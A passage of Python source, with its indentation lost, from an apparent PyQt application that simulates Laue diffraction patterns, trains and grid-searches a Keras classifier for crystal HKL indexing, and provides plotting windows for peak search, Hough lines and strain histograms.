noisy_data = False
remove_peaks = False
seednumber = np.random.randint(1e6)
values.append([1, 0, material_,material1_,
self.emin, self.emax, detectorparameters,
pixelsize,True,
ang_maxx, step,
classhkl, classhkl1,
noisy_data,
remove_peaks,
seednumber,
hkl_all_class,
lattice_material,
None,
normal_hkl,
index_hkl,
hkl_all_class1,
lattice_material1,
None,
normal_hkl1,
index_hkl1,
dim1, dim2,
removeharmonics,
1, i, i, save_directory_,
None, None, self.modelp,
self.misorientation_angle,
max_millerindex,max_millerindex1,
self.general_diff_rules,
self.crystal,
self.crystal1,
None])
if material_ != material1_:
seednumber = np.random.randint(1e6)
values.append([0, 1, material_,material1_,
self.emin, self.emax, detectorparameters,
pixelsize,True,
ang_maxx, step,
classhkl, classhkl1,
noisy_data,
remove_peaks,
seednumber,
hkl_all_class,
lattice_material,
None,
normal_hkl,
index_hkl,
hkl_all_class1,
lattice_material1,
None,
normal_hkl1,
index_hkl1,
dim1, dim2,
removeharmonics,
2, i, i, save_directory_,
None, None, self.modelp,
self.misorientation_angle,
max_millerindex,max_millerindex1,
self.general_diff_rules,
self.crystal,
self.crystal1,
None])
### include slightly misoriented two crystals of different materails
seednumber = np.random.randint(1e6)
values.append([1, 1, material_,material1_,
self.emin, self.emax, detectorparameters,
pixelsize,True,
ang_maxx, step,
classhkl, classhkl1,
noisy_data,
remove_peaks,
seednumber,
hkl_all_class,
lattice_material,
None,
normal_hkl,
index_hkl,
hkl_all_class1,
lattice_material1,
None,
normal_hkl1,
index_hkl1,
dim1, dim2,
removeharmonics,
3, i, i, save_directory_,
None, None, self.modelp,
self.misorientation_angle,
max_millerindex,max_millerindex1,
self.general_diff_rules,
self.crystal,
self.crystal1,
None])
chunks = chunker_list(values, self.ncpu)
chunks_mp = list(chunks)
meta = {'t1':time.time(),
'flag':1}
for ijk in range(int(self.ncpu)):
self._inputs_queue.put((chunks_mp[ijk], self.ncpu, meta))
self.max_progress = max_progress
while True:
count = 0
for i in range(self.ncpu):
if not self._worker_process[i].is_alive():
self._worker_process[i].join()
count += 1
else:
time.sleep(0.1)
self.progress.setValue(self.update_progress)
QApplication.processEvents()
if count == self.ncpu:
self.progress.setValue(self.max_progress)
QApplication.processEvents()
return
def update_data_mp(self):
if not self._outputs_queue.empty():
self.timermp.blockSignals(True)
r_message = self._outputs_queue.get()
self.update_progress = self.update_progress + r_message
self.timermp.blockSignals(False)
def generate_training_data(self):
### using MP libraries
self.ncpu = cpu_count_user
self.write_to_console("Using Multiprocessing ("+str(self.ncpu)+" cpus) for generation of simulated Laue patterns for training")
self._inputs_queue = Queue()
self._outputs_queue = Queue()
## Update data from multiprocessing
self.update_progress = 0
self.max_progress = 0
self.timermp = QtCore.QTimer()
self.timermp.setInterval(100) ## check every second (update the list of files in folder)
self.timermp.timeout.connect(self.update_data_mp)
self.timermp.start()
self.write_to_console("Generating training dataset")
self.status.showMessage("Training dataset generation in progress!")
if self.input_params["hkl_max_identify"] == "auto" and self.input_params["hkl_max_identify1"] != "auto":
self.write_to_console("Calculating the HKL bounds for training dataset")
self.n, _ = self.temp_HKL(removeharmonics=1)
elif self.input_params["hkl_max_identify"] == "auto" and self.input_params["hkl_max_identify1"] == "auto":
self.write_to_console("Calculating the HKL bounds for training dataset")
self.n, self.n1 = self.temp_HKL(removeharmonics=1)
elif self.input_params["hkl_max_identify"] != "auto" and self.input_params["hkl_max_identify1"] == "auto":
self.write_to_console("Calculating the HKL bounds for training dataset")
_, self.n1 = self.temp_HKL(removeharmonics=1)
## generate reference HKL library
self.write_to_console("Directory for training dataset is : "+self.save_directory)
## procedure for generation of GROUND TRUTH classes
# =============================================================================
# VERY IMPORTANT; TAKES Significant time; verify again for other symmetries
# =============================================================================
generate_classHKL(self.n, self.rules, self.lattice_material, self.symmetry, self.material_, \
self.crystal, self.SG, self.general_diff_rules, self.save_directory, \
self.write_to_console, self.progress, QApplication, self.maximum_angle_to_search, self.step_for_binning)
if self.material_ != self.material1_:
generate_classHKL(self.n1, self.rules1, self.lattice_material1, self.symmetry1, self.material1_, \
self.crystal1, self.SG1, self.general_diff_rules1, self.save_directory, \
self.write_to_console, self.progress, QApplication, self.maximum_angle_to_search, self.step_for_binning)
############ GENERATING TRAINING DATA
self.update_progress = 0
self.max_progress = 0
self.load_dataset(material_=self.material_, material1_=self.material1_, ang_maxx=self.maximum_angle_to_search,
step=self.step_for_binning, mode=self.mode_of_analysis,
nb_grains=self.nb_grains_per_lp,
grains_nb_simulate=self.grains_nb_simulate,
data_realism = True, detectorparameters=self.detectorparameters,
pixelsize=self.pixelsize, type_="training_data", var0=1,
dim1=self.input_params["dim1"], dim2=self.input_params["dim2"], removeharmonics=1)
# ############ GENERATING TESTING DATA
self.update_progress = 0
self.max_progress = 0
self.load_dataset(material_=self.material_, material1_=self.material1_, ang_maxx=self.maximum_angle_to_search,
step=self.step_for_binning, mode=self.mode_of_analysis,
nb_grains=self.nb_grains_per_lp,
grains_nb_simulate=self.grains_nb_simulate//self.factor,
data_realism = True, detectorparameters=self.detectorparameters,
pixelsize=self.pixelsize, type_="testing_data", var0=0,
dim1=self.input_params["dim1"], dim2=self.input_params["dim2"], removeharmonics=1)
## write MTEX data with training orientation
try:
write_training_testing_dataMTEX(self.save_directory,self.material_,self.material1_,
self.lattice_material,self.lattice_material1,
material0_lauegroup, material1_lauegroup)
except:
print("Error writing the MTEX file of training and testing data")
self.write_to_console("Error writing the MTEX file of training and testing data")
if self.generate_additional_data:
print("In development; generating a combination of existing dataset")
self.status.showMessage("Training dataset generation completed with multi CPUs!")
rmv_freq_class(self.freq_rmv, self.elements, self.freq_rmv1, self.elements1,\
self.save_directory, self.material_, self.material1_, self.write_to_console,\
self.progress, QApplication)
self.write_to_console("See the class occurances above and choose appropriate frequency removal parameter to train quickly the network by having few output classes!, if not continue as it is.")
self.write_to_console("Press Train network button to Train")
self.train_nn.setEnabled(True)
self.timermp.stop()
def train_neural_network(self,):
self.status.showMessage("Neural network training in progress!")
self.train_nn.setEnabled(False)
rmv_freq_class(self.freq_rmv, self.elements, self.freq_rmv1, self.elements1,\
self.save_directory, self.material_, self.material1_, self.write_to_console,\
self.progress, QApplication)
self.classhkl = np.load(self.save_directory+"//MOD_grain_classhkl_angbin.npz")["arr_0"]
self.angbins = np.load(self.save_directory+"//MOD_grain_classhkl_angbin.npz")["arr_1"]
self.loc_new = np.load(self.save_directory+"//MOD_grain_classhkl_angbin.npz")["arr_2"]
with open(self.save_directory+"//class_weights.pickle", "rb") as input_file:
class_weights = cPickle.load(input_file)
self.class_weights = class_weights[0]
## load model and train
self.model = model_arch_general(len(self.angbins)-1, len(self.classhkl),
kernel_coeff= self.kernel_coeff, bias_coeff=self.bias_coeff,
lr=self.learning_rate, write_to_console=self.write_to_console)
self.train_model()
self.trialtoolbar1.setEnabled(True)
self.predict_lnn.setEnabled(True)
self.status.showMessage("Neural network training completed!")
def train_model(self, prefix="", tag = 0):
if tag == 2:
## retraining from file
try:
self.classhkl = np.load(self.save_directory+"//MOD_grain_classhkl_angbin.npz")["arr_0"]
self.angbins = np.load(self.save_directory+"//MOD_grain_classhkl_angbin.npz")["arr_1"]
self.loc_new = np.load(self.save_directory+"//MOD_grain_classhkl_angbin.npz")["arr_2"]
with open(self.save_directory+"//class_weights.pickle", "rb") as input_file:
class_weights = cPickle.load(input_file)
self.class_weights = class_weights[0]
## need to compile again if loaded from file, better to just call the class, if architecture is same
self.write_to_console("Constructing model")
self.model = model_arch_general(len(self.angbins)-1, len(self.classhkl),
kernel_coeff= self.kernel_coeff, bias_coeff=self.bias_coeff,
lr=self.learning_rate, write_to_console=self.write_to_console)
list_of_files = glob.glob(self.save_directory+'//*.h5')
latest_file = max(list_of_files, key=os.path.getctime)
self.write_to_console("Taking the latest Weight file from the Folder: " + latest_file)
load_weights = latest_file
self.model.load_weights(load_weights)
self.write_to_console("Uploading weights to model")
self.write_to_console("All model files found and loaded")
except:
self.write_to_console("Model directory is not proper or files are missing. please configure the params")
return
## temp function to quantify the spots and classes present in a batch
batch_size = self.input_params["batch_size"]
trainy_inbatch = array_generator_verify(self.save_directory+"//training_data", batch_size,
len(self.classhkl), self.loc_new, self.write_to_console)
self.write_to_console("Number of spots in a batch of %i files : %i" %(batch_size, len(trainy_inbatch)))
self.write_to_console("Min, Max class ID is %i, %i" %(np.min(trainy_inbatch), np.max(trainy_inbatch)))
# try varying batch size and epochs
epochs = self.input_params["epochs"]
## Batch loading for numpy grain files (Keep low value to avoid overcharging the RAM)
if self.material_ != self.material1_:
nb_grains_list = list(range(self.nb_grains_per_lp+1))
nb_grains1_list = list(range(self.nb_grains_per_lp1+1))
list_permute = list(itertools.product(nb_grains_list, nb_grains1_list))
list_permute.pop(0)
steps_per_epoch = (len(list_permute) * self.grains_nb_simulate)//batch_size
else:
steps_per_epoch = int((self.nb_grains_per_lp * self.grains_nb_simulate) / batch_size)
val_steps_per_epoch = int(steps_per_epoch / self.factor)
if steps_per_epoch == 0:
steps_per_epoch = 1
if val_steps_per_epoch == 0:
val_steps_per_epoch = 1
## Load generator objects from filepaths
training_data_generator = array_generator(self.save_directory+"//training_data", batch_size, \
len(self.classhkl), self.loc_new, self.write_to_console)
testing_data_generator = array_generator(self.save_directory+"//testing_data", batch_size, \
len(self.classhkl), self.loc_new, self.write_to_console)
######### TRAIN THE DATA
self.progress.setMaximum(epochs*steps_per_epoch)
# from clr_callback import CyclicLR
# clr = CyclicLR(base_lr=0.0005, max_lr=0.001, step_size=steps_per_epoch*5, mode='triangular')
es = EarlyStopping(monitor='val_accuracy', mode='max', patience=2)
# es = EarlyStopping(monitor='categorical_crossentropy', patience=2)
ms = ModelCheckpoint(self.save_directory+"//best_val_acc_model.h5", monitor='val_accuracy',
mode='max', save_best_only=True)
# model save directory and filename
if self.material_ != self.material1_:
model_name = self.save_directory+"//model_"+self.material_+"_"+self.material1_+prefix
else:
model_name = self.save_directory+"//model_"+self.material_+prefix
log = LoggingCallback(self.write_to_console, self.progress, QApplication, self.model, model_name)
stats_model = self.model.fit(
training_data_generator,
epochs=epochs,
steps_per_epoch=steps_per_epoch,
validation_data=testing_data_generator,
validation_steps=val_steps_per_epoch,
verbose=1,
class_weight=self.class_weights,
callbacks=[es, ms, log] # es, ms, clr
)
self.progress.setValue(epochs*steps_per_epoch)
QApplication.processEvents()
# Save model config and weightsp
if tag == 0:
## new trained model, save files
model_json = self.model.to_json()
with open(model_name+".json", "w") as json_file:
json_file.write(model_json)
# serialize weights to HDF5
self.model.save_weights(model_name+".h5")
self.write_to_console("Saved model to disk")
self.write_to_console( "Training Accuracy: "+str( stats_model.history['accuracy'][-1]))
self.write_to_console( "Training Loss: "+str( stats_model.history['loss'][-1]))
self.write_to_console( "Validation Accuracy: "+str( stats_model.history['val_accuracy'][-1]))
self.write_to_console( "Validation Loss: "+str( stats_model.history['val_loss'][-1]))
epochs = range(1, len(self.model.history.history['loss']) + 1)
fig, ax = plt.subplots(1,2)
ax[0].plot(epochs, self.model.history.history['loss'], 'r', label='Training loss')
ax[0].plot(epochs, self.model.history.history['val_loss'], 'r', ls="dashed", label='Validation loss')
ax[0].legend()
ax[1].plot(epochs, self.model.history.history['accuracy'], 'g', label='Training Accuracy')
ax[1].plot(epochs, self.model.history.history['val_accuracy'], 'g', ls="dashed", label='Validation Accuracy')
ax[1].legend()
if self.material_ != self.material1_:
plt.savefig(self.save_directory+"//loss_accuracy_"+self.material_+"_"+self.material1_+prefix+".png", bbox_inches='tight',format='png', dpi=1000)
else:
plt.savefig(self.save_directory+"//loss_accuracy_"+self.material_+prefix+".png", bbox_inches='tight',format='png', dpi=1000)
plt.close()
if self.material_ != self.material1_:
text_file = open(self.save_directory+"//loss_accuracy_logger_"+self.material_+"_"+self.material1_+prefix+".txt", "w")
else:
text_file = open(self.save_directory+"//loss_accuracy_logger_"+self.material_+prefix+".txt", "w")
text_file.write("# EPOCH, LOSS, VAL_LOSS, ACCURACY, VAL_ACCURACY" + "\n")
for inj in range(len(epochs)):
string1 = str(epochs[inj]) + ","+ str(self.model.history.history['loss'][inj])+\
","+str(self.model.history.history['val_loss'][inj])+","+str(self.model.history.history['accuracy'][inj])+\
","+str(self.model.history.history['val_accuracy'][inj])+" \n"
text_file.write(string1)
text_file.close()
x_test, y_test = vali_array(self.save_directory+"//testing_data", 50, len(self.classhkl), self.loc_new,
self.write_to_console)
y_test = np.argmax(y_test, axis=-1)
y_pred = np.argmax(self.model.predict(x_test), axis=-1)
self.write_to_console(classification_report(y_test, y_pred))
self.write_to_console( "Training is Completed; You can use the Retrain function to run for more epoch with varied batch size")
self.write_to_console( "Training is Completed; You can use the Prediction and Live Prediction module now")
def grid_search_hyperparams(self,):
classhkl = np.load(self.save_directory+"//MOD_grain_classhkl_angbin.npz")["arr_0"]
angbins = np.load(self.save_directory+"//MOD_grain_classhkl_angbin.npz")["arr_1"]
loc_new = np.load(self.save_directory+"//MOD_grain_classhkl_angbin.npz")["arr_2"]
with open(self.save_directory+"//class_weights.pickle", "rb") as input_file:
class_weights = cPickle.load(input_file)
class_weights = class_weights[0]
batch_size = self.input_params["batch_size"]
trainy_inbatch = array_generator_verify(self.save_directory+"//training_data", batch_size,
len(classhkl), loc_new, self.write_to_console)
self.write_to_console("Number of spots in a batch of %i files : %i" %(batch_size, len(trainy_inbatch)))
self.write_to_console("Min, Max class ID is %i, %i" %(np.min(trainy_inbatch), np.max(trainy_inbatch)))
self.write_to_console("Starting hypergrid optimization: looking in a grid to optimize the learning rate and regularization coefficients.")
# try varying batch size and epochs
epochs = 1 #self.input_params["epochs"]
## Batch loading for numpy grain files (Keep low value to avoid overcharging the RAM)
steps_per_epoch = int((self.nb_grains_per_lp * self.grains_nb_simulate)/batch_size)
val_steps_per_epoch = int(steps_per_epoch /self.factor)
if steps_per_epoch == 0:
steps_per_epoch = 1
if val_steps_per_epoch == 0:
val_steps_per_epoch = 1
## Load generator objects from filepaths
training_data_generator = array_generator(self.save_directory+"//training_data", batch_size, \
len(classhkl), loc_new, self.write_to_console)
testing_data_generator = array_generator(self.save_directory+"//testing_data", batch_size, \
len(classhkl), loc_new, self.write_to_console)
# grid search values
values = [1e-1, 1e-2, 1e-3, 1e-4, 1e-5, 1e-6]
all_train, all_test = list(), list()
all_trainL, all_testL = list(), list()
parameters = list()
text_file = open(self.save_directory+"//parameter_hypergrid_"+self.material_+".txt", "w")
text_file.write("# Iter, Learning_Rate, Bias_Coeff, Kernel_Coeff, Train_Acc, Train_Loss, Test_Acc, Test_Loss, LR_index, BC_index, KC_index" + "\n")
self.progress.setMaximum(len(values)*len(values)*len(values))
iter_cnt= 0
for i, param in enumerate(values):
for j, param1 in enumerate(values):
for k, param2 in enumerate(values):
# define model
iter_cnt += 1
model = model_arch_general(len(angbins)-1, len(classhkl),
kernel_coeff = param2,
bias_coeff = param1,
lr = param, verbose=0,
write_to_console=self.write_to_console)
# fit model
stats_model = model.fit(
training_data_generator,
epochs=epochs,
steps_per_epoch=steps_per_epoch,
validation_data=testing_data_generator,
validation_steps=val_steps_per_epoch,
verbose=0,
class_weight=class_weights,
)
# evaluate the model
train_acc = stats_model.history['accuracy'][-1]
test_acc = stats_model.history['val_accuracy'][-1]
train_loss = stats_model.history['loss'][-1]
test_loss = stats_model.history['val_loss'][-1]
all_train.append(train_acc)
all_test.append(test_acc)
all_trainL.append(train_loss)
all_testL.append(test_loss)
parameters.append([param,param1,param2])
string1 = str(iter_cnt) +","+ str(param) + ","+ str(param1)+\
","+str(param2)+","+str(train_acc)+\
","+str(train_loss)+ ","+str(test_acc)+","+str(test_loss)+","+ str(i) + ","+ str(j)+\
","+str(k)+ " \n"
text_file.write(string1)
self.progress.setValue(iter_cnt)
QApplication.processEvents()
text_file.close()
class MplCanvas(FigureCanvas):
def __init__(self, parent=None, width=5, height=4, dpi=100, subplot=1, mat_bool=True):
self.fig = Figure(figsize=(width, height), dpi=dpi)
if mat_bool:
self.axes = self.fig.add_subplot(131)
self.axes1 = self.fig.add_subplot(132)
self.axes2 = self.fig.add_subplot(133)
else:
self.axes = self.fig.add_subplot(141)
self.axes1 = self.fig.add_subplot(142)
self.axes2 = self.fig.add_subplot(143)
self.axes3 = self.fig.add_subplot(144)
super(MplCanvas, self).__init__(self.fig)
class MplCanvas1(FigureCanvas):
def __init__(self, parent=None, width=5, height=4, dpi=100):
self.fig = Figure(figsize=(width, height), dpi=dpi)
self.axes = self.fig.add_subplot(111)
super(MplCanvas1, self).__init__(self.fig)
class MplCanvas2(FigureCanvas):
def __init__(self, parent=None, width=5, height=4, dpi=100):
self.fig = Figure(figsize=(width, height), dpi=dpi)
self.axes = self.fig.add_subplot(231)
self.axes1 = self.fig.add_subplot(232)
self.axes2 = self.fig.add_subplot(233)
self.axes3 = self.fig.add_subplot(234)
self.axes4 = self.fig.add_subplot(235)
self.axes5 = self.fig.add_subplot(236)
super(MplCanvas2, self).__init__(self.fig)
class MyPopup_image_v1(QWidget):
def __init__(self, ix, iy, file, data, ccd_label, function_predict, image_no, detectorparameters):
QWidget.__init__(self)
self.layout = QVBoxLayout() # QGridLayout()
self.canvas = MplCanvas1(self, width=10, height=10, dpi=100)
self.toolbar = NavigationToolbar(self.canvas, self)
self.iy,self.ix,self.file = iy, ix, file
self.ccd_label = ccd_label
self.data = data
self.pix_x, self.pix_y = [], []
self.scatter = None
self.function_predict = function_predict
self.image_no = image_no
self.detectorparameters = detectorparameters
# set the layout
self.layout.addWidget(self.toolbar, 0)
self.layout.addWidget(self.canvas, 100)
self.ImaxDisplayed = 2*np.average(data)
self.IminDisplayed = np.average(data) - 0.2*np.average(data)
self.slider = QSlider(QtCore.Qt.Horizontal, self)
self.slider.setRange(0, np.max(data))
self.layout.addWidget(self.slider)
self.slider.setValue(self.IminDisplayed)
self.slider.valueChanged[int].connect(self.sliderMin)
self.slider1 = QSlider(QtCore.Qt.Horizontal, self)
self.slider1.setRange(10, np.max(data))
self.layout.addWidget(self.slider1)
self.slider1.setValue(self.ImaxDisplayed)
self.slider1.valueChanged[int].connect(self.sliderMax)
self.bkg_treatment = QLineEdit()
self.bkg_treatment.setText("A-B")
self.peak_params = QLineEdit()
self.peak_params.setText("500,15,15")
self.predict_params = QLineEdit()
self.predict_params.setText("0.85, 0.20, v2, 8, 0.2, 50")
try:
config_setting = configparser.ConfigParser()
filepath = resource_path('settings.ini')
config_setting.read(filepath)
residues_threshold = float(config_setting.get('CALLER', 'residues_threshold'))
nb_spots_global_threshold = int(config_setting.get('CALLER', 'nb_spots_global_threshold'))
option_global = config_setting.get('CALLER', 'option_global')
nb_spots_consider = int(config_setting.get('CALLER', 'nb_spots_consider'))
intensity_threshold = int(float(config_setting.get('CALLER', 'intensity')))
boxsize = int(float(config_setting.get('CALLER', 'boxsize')))
FitPixelDev_global123 = int(float(config_setting.get('CALLER', 'pixdev')))
softmax_threshold_global123 = float(config_setting.get('CALLER', 'cap_softmax'))
cap_matchrate123 = float(config_setting.get('CALLER', 'cap_mr'))
strain_free_parameters = config_setting.get('CALLER', 'strain_free_parameters').split(",")
additional_expression = config_setting.get('CALLER', 'additional_expression').split(",")
if intensity_threshold != None and boxsize != None and FitPixelDev_global123!=None:
self.peak_params.setText(str(intensity_threshold)+","+str(boxsize)+","+str(FitPixelDev_global123))
self.predict_params.setText(str(float(softmax_threshold_global123))+","+str(float(cap_matchrate123))+
","+option_global+","+
str(nb_spots_global_threshold)+","+str(residues_threshold)+
","+str(nb_spots_consider))
self.residues_threshold = residues_threshold
self.nb_spots_global_threshold = nb_spots_global_threshold
self.option_global = option_global
self.nb_spots_consider = nb_spots_consider
self.intensity_threshold = intensity_threshold
self.boxsize = boxsize
self.FitPixelDev_global123 = FitPixelDev_global123
self.softmax_threshold_global123 = softmax_threshold_global123
self.cap_matchrate123 = cap_matchrate123
self.strain_free_parameters = strain_free_parameters
self.additional_expression = additional_expression
except:
self.residues_threshold = 0.5
self.nb_spots_global_threshold = 8
self.option_global = "v2"
self.nb_spots_consider = 100
self.intensity_threshold = 200
self.boxsize = 15
self.FitPixelDev_global123 = 15
self.softmax_threshold_global123 = 0.85
self.cap_matchrate123 = 0.2
self.strain_free_parameters = ["rotx", "roty", "rotz", "alpha", "beta", "gamma", "b", "c"]
self.additional_expression = ["none"]
print("error with setting config file")
self.corrected_data = None
self.image_mode = QComboBox()
mode_ = ["raw","bkg_corrected"]
for s in mode_:
self.image_mode.addItem(s)
self.btn_peak_search = QPushButton("Peak search")
self.btn_peak_search.clicked.connect(self.peak_search)
self.predicthkl = QPushButton("run prediction")
self.predicthkl.clicked.connect(self.prediction_hkl)
self.plothough = QPushButton("Show hough transform results")
self.plothough.clicked.connect(self.plot_houghlines)
self.refresh_plot = QPushButton("Refresh plot")
self.refresh_plot.clicked.connect(self.refresh_plots)
self.propagate_button = QPushButton("Propagate values")
self.propagate_button.clicked.connect(self.propagate)
self.btn_peak_search.setEnabled(True)
self.predicthkl.setEnabled(False)
self.propagate_button.setEnabled(False)
self.plothough.setEnabled(False)
## add some buttons here for peak search and peak options
## and then predict again with neural network with its options
## send the data back to update the main variables
formLayout = QFormLayout()
formLayout.addRow('Background treatment expression', self.bkg_treatment)
formLayout.addRow('Intensity; box size; pix dev', self.peak_params)
formLayout.addRow('Image mode', self.image_mode)
formLayout.addRow('softmax acc.; Mr threshold; 4hyperparams', self.predict_params)
formLayout.addRow(self.btn_peak_search, self.predicthkl)
formLayout.addRow(self.refresh_plot, self.plothough)
formLayout.addRow("Propagate the new parameters", self.propagate_button)
self.layout.addLayout(formLayout)
self.setLayout(self.layout)
# compute background
self.show_bkg_corrected_img()
self.draw_something()
def refresh_plots(self):
self.draw_something()
def show_bkg_corrected_img(self):
backgroundimage = ImProc.compute_autobackground_image(self.data, boxsizefilter=10)
self.corrected_data = ImProc.computefilteredimage(self.data, backgroundimage, self.ccd_label, usemask=True,
formulaexpression=self.bkg_treatment.text())
def propagate(self):
config_setting1 = configparser.ConfigParser()
filepath = resource_path('settings.ini')
print("Settings path is "+filepath)
config_setting1.read(filepath)
config_setting1.set('CALLER', 'residues_threshold',str(self.residues_threshold))
config_setting1.set('CALLER', 'nb_spots_global_threshold',str(self.nb_spots_global_threshold))
config_setting1.set('CALLER', 'option_global',self.option_global)
config_setting1.set('CALLER', 'use_om_user',"false")
config_setting1.set('CALLER', 'nb_spots_consider',str(self.nb_spots_consider))
config_setting1.set('CALLER', 'path_user_OM',"")
config_setting1.set('CALLER', 'intensity', str(self.intensity_threshold))
config_setting1.set('CALLER', 'boxsize', str(self.boxsize))
config_setting1.set('CALLER', 'pixdev', str(self.FitPixelDev_global123))
config_setting1.set('CALLER', 'cap_softmax', str(self.softmax_threshold_global123))
config_setting1.set('CALLER', 'cap_mr', str(self.cap_matchrate123))
config_setting1.set('CALLER', 'strain_free_parameters', ",".join(self.strain_free_parameters))
config_setting1.set('CALLER', 'additional_expression', ",".join(self.additional_expression))
with open(filepath, 'w') as configfile:
config_setting1.write(configfile)
print("Config settings updated")
def neighbor_UB(self):
#TODO
print("UB matrix indexation from neighbors in development")
pass
def plot_houghlines(self):
print("Plotting Hough lines")
s_ix = np.argsort(self.peakXY[:, 2])[::-1]
self.peakXY = self.peakXY[s_ix]
pixelsize = dictLT.dict_CCD[self.ccd_label][1]
twicetheta, chi = Lgeo.calc_uflab(self.peakXY[:,0], self.peakXY[:,1], self.detectorparameters,
returnAngles=1,
pixelsize=pixelsize,
kf_direction='Z>0')
# Classic straight-line Hough transform
imageGNO, nbpeaks, halfdiagonal = computeGnomonicImage(twicetheta, chi)
hough, theta_h, d_h = hough_line(imageGNO)
# Generating figure 1
fig, axes = plt.subplots(1, 3, figsize=(15, 6))
ax = axes.ravel()
ax[0].imshow(self.data,interpolation="nearest",vmin=self.IminDisplayed, vmax=self.ImaxDisplayed)
ax[0].set_title('Input image')
ax[0].set_axis_off()
ax[1].imshow(np.log(1 + hough),
extent=[np.rad2deg(theta_h[-1]), np.rad2deg(theta_h[0]), d_h[-1], d_h[0]],
cmap=cm.gray, aspect=1/1.5)
ax[1].set_title('Hough transform')
ax[1].set_xlabel('Angles (degrees)')
ax[1].set_ylabel('Distance (pixels)')
ax[1].axis('image')
ax[2].imshow(imageGNO, cmap=cm.gray)
for _, angle, dist in zip(*hough_line_peaks(hough, theta_h, d_h)):
y0 = (dist - 0 * np.cos(angle)) / np.sin(angle)
y1 = (dist - imageGNO.shape[1] * np.cos(angle)) / np.sin(angle)
ax[2].plot((0, imageGNO.shape[1]), (y0, y1), '-r', lw=0.5)
ax[2].set_xlim((0, imageGNO.shape[1]))
ax[2].set_ylim((imageGNO.shape[0], 0))
ax[2].set_axis_off()
ax[2].set_title('Detected lines')
plt.tight_layout()
plt.show()
def peak_search(self):
self.propagate_button.setEnabled(False)
intens = int(float(self.peak_params.text().split(",")[0]))
bs = int(float(self.peak_params.text().split(",")[1]))
pixdev = int(float(self.peak_params.text().split(",")[2]))
bkg_treatment = self.bkg_treatment.text()
try:
peak_XY = RMCCD.PeakSearch(
self.file,
stackimageindex = -1,
CCDLabel=self.ccd_label,
NumberMaxofFits=5000,
PixelNearRadius=10,
removeedge=2,
IntensityThreshold=intens,
local_maxima_search_method=0,
boxsize=bs,
position_definition=1,
verbose=0,
fit_peaks_gaussian=1,
xtol=0.001,
FitPixelDev=pixdev,
return_histo=0,
MinIntensity=0,
PeakSizeRange=(0.65,200),
write_execution_time=1,
Data_for_localMaxima = "auto_background",
formulaexpression=bkg_treatment,
Remove_BlackListedPeaks_fromfile=None,
reject_negative_baseline=True,
Fit_with_Data_for_localMaxima=False,
maxPixelDistanceRejection=15.0,
)
peak_XY = peak_XY[0]
self.pix_x, self.pix_y = peak_XY[:,0], peak_XY[:,1]
self.peakXY = peak_XY
except:
print("Error in Peak detection for "+ self.file)
self.pix_x, self.pix_y = [], []
self.peakXY = []
self.draw_something()
self.predicthkl.setEnabled(True)
self.plothough.setEnabled(True)
def prediction_hkl(self):
try:
intens = int(float(self.peak_params.text().split(",")[0]))
bs = int(float(self.peak_params.text().split(",")[1]))
pixdev = int(float(self.peak_params.text().split(",")[2]))
smt = float(self.predict_params.text().split(",")[0])
mrt = float(self.predict_params.text().split(",")[1])
nb_spots_consider_global123 = int(float(self.predict_params.text().split(",")[5]))
residues_threshold123 = float(self.predict_params.text().split(",")[4])
option_global123 = self.predict_params.text().split(",")[2]
nb_spots_global_threshold123 = int(float(self.predict_params.text().split(",")[3]))
self.residues_threshold = residues_threshold123
self.nb_spots_global_threshold = nb_spots_global_threshold123
self.option_global = option_global123
self.nb_spots_consider = nb_spots_consider_global123
self.intensity_threshold = intens
self.boxsize = bs
self.FitPixelDev_global123 = pixdev
self.softmax_threshold_global123 = smt
self.cap_matchrate123 = mrt
self.function_predict(self.file, intens, bs, pixdev, smt, mrt, self.image_no, nb_spots_consider_global123,
residues_threshold123, option_global123, nb_spots_global_threshold123, self.peakXY,
self.strain_free_parameters,self.additional_expression)
self.propagate_button.setEnabled(True)
except:
print("Error during prediction; reinitialize the optimize window again, most probably this will fix it")
def draw_something(self):
# Drop off the first y element, append a new one.
self.canvas.axes.cla()
self.canvas.axes.set_title("Laue pattern of pixel x=%d, y=%d (file: %s)"%(self.iy,self.ix,self.file), loc='center', fontsize=8)
self.canvas.axes.set_ylabel(r'Y pixel',fontsize=8)
self.canvas.axes.set_xlabel(r'X pixel', fontsize=8)
if self.image_mode.currentText() == "raw":
self.canvas.axes.imshow(self.data,interpolation="nearest",vmin=self.IminDisplayed, vmax=self.ImaxDisplayed)
else:
self.canvas.axes.imshow(self.corrected_data,interpolation="nearest",vmin=self.IminDisplayed, vmax=self.ImaxDisplayed)
if len(self.pix_x)!=0:
self.canvas.axes.scatter(self.pix_x, self.pix_y, s=120, facecolor='none', edgecolor='r', label="Peaks")
self.canvas.draw()
def sliderMin(self, val):
try:
#slider control function
if val > self.ImaxDisplayed:
print("Min value cannot be greater than Max")
self.draw_something()
return
self.IminDisplayed= val
self.draw_something()
except:
print("Error: value", val)
def sliderMax(self, val):
try:
#slider control function
if val < self.IminDisplayed:
print("Max value cannot be less than Min")
self.draw_something()
return
self.ImaxDisplayed= val
self.draw_something()
except:
print("Error: value", val)
class MyPopup_image_v2(QWidget):
def __init__(self, matrix, title, flag=0):
QWidget.__init__(self)
app_icon = QtGui.QIcon()
app_icon.addFile(Logo, QtCore.QSize(16,16))
self.setWindowIcon(app_icon)
self.layout = QVBoxLayout() # QGridLayout()
self.canvas = MplCanvas2(self, width=10, height=10, dpi=100)
self.toolbar = NavigationToolbar(self.canvas, self)
# set the layout
self.layout.addWidget(self.toolbar, 0)
self.layout.addWidget(self.canvas, 100)
self.setLayout(self.layout)
# Drop off the first y element, append a new one.
self.canvas.axes.cla()
self.canvas.axes.set_title(title, loc='center', fontsize=10)
if flag == 0:
matrix = matrix.reshape((matrix.shape[0]*matrix.shape[1],3,3))
e11c = matrix[:,0,0]
e22c = matrix[:,1,1]
e33c = matrix[:,2,2]
e12c = matrix[:,0,1]
e13c = matrix[:,0,2]
e23c = matrix[:,1,2]
e11c = e11c.flatten()
e22c = e22c.flatten()
e33c = e33c.flatten()
e12c = e12c.flatten()
e13c = e13c.flatten()
e23c = e23c.flatten()
e11c = e11c[~np.isnan(e11c)]
e22c = e22c[~np.isnan(e22c)]
e33c = e33c[~np.isnan(e33c)]
e12c = e12c[~np.isnan(e12c)]
e13c = e13c[~np.isnan(e13c)]
e23c = e23c[~np.isnan(e23c)]
bins = 30
# try:
self.canvas.axes.set_title(r"$\epsilon_{11}$ (%)", loc='center', fontsize=10)
logdata = e11c
self.canvas.axes.hist(logdata, bins=bins, density=True, alpha=0.8)
self.canvas.axes.set_ylabel('Frequency', fontsize=8)
